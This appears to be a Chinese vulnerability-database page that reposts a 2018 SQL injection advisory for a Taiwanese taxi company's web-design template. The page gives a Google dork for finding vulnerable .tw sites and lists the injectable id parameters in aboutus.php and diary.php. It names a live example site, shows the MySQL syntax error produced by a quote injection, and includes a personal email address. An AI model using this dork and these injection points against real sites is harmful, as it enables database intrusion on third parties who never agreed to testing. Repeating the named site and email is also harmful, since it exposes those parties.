Taiwan 本公司已投保GPS衛星定位乘客險捌佰萬元 | 網頁設計 Web Design SQL Injection Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1034906 漏洞类型
发布时间 2018-05-31 更新时间 2018-05-31
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018050318
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#########################################################################################################

# Exploit Title : Taiwan 本公司已投保GPS衛星定位乘客險捌佰萬元 | 網頁設計 Web Design SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos 
# Date : 31/05/2018
# Owner of the Script [ E-Mail ] : qkelly@gmail.com
# Tested On : Windows
# Exploit Risk : Medium
# CWE: CWE-89

#########################################################################################################

# Exploit Title : The company has insured GPS satellite positioning passenger insurance million Web Design Taiwan SQL Injection Vulnerability

# Google Dork : intext:''本公司已投保GPS衛星定位乘客險捌佰萬元 | 網頁設計'' site:tw

It means in English => The company has insured GPS satellite positioning passenger insurance million Web Design

# Exploit : /aboutus.php?id=[SQL Injection]

# Exploit : /diary.php?id=[SQL Injection]

#########################################################################################################

# Example Site =>   hitaxi.tw/aboutus.php?id=1%27 => [ Proof of Concept for SQL Inj ] => archive.is/VSC6n

# Database Error
Message: Could not query database!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
Script: /aboutus.php?id=1%27

#########################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#########################################################################################################